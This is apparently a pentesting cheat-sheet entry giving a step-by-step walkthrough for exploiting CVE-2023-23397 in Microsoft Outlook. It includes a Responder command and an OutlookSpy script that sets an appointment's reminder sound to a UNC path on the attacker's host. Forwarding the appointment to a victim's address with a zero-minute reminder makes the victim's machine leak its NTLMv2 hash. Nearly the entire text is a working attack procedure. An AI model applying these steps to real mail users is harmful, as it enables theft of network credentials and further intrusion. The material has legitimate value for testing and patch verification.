Outlook Reminder Privilege Escalation
Last modified: 2023-03-28
The Outlook’s Reminder method is vulnerable to privilege escalation by abusing the UNC (Universal Naming Convention) file path of the reminder sound. CVE-2023-23397.
To carry out this attack, the OutlookSpy is required. So please install it before proceeding.
First off, start responder in our local machine to capture NetNTLM authentication.
# -I: Interface (eth0, tun0, etc.) responder -I tun0
In Outlook, select Home tab and click New Items then choose Appointment in drawer menu.
In new Appointment window, select OutlookSpy tab then click CurrentItem. The AppointmentItem window will open.
In AppointmentItem window, click Script tab and input the following value.
Replace “10.0.0.1” with your local server ip.
AppointmentItem.ReminderOverrideDefault = true AppointmentItem.ReminderPlaySound = true AppointmentItem.ReminderSoundFile ="\\10.0.0.1\test.wav"
After that, click Run button to apply the new properties.
To confirm if the properties applied, click Properties tab and choose the following items in left pane.
Close the AppointmentItem window.
- Click Appointment tab and click Reminder in the Options section. Then set 0 minutes.
- Fill the Subject, Location and Message with arbitrary values.
- To send the appointment to the victim address, click Forward in Actions section in Appointment tab. Then enter the victim email address as a destination. Now click Send button.
- Because we set the reminder with 0 minutes, we should see the reminder popup immediately after saving.
- In our terminal, responder, that we’ve launched, captured the NTLMv2 hash.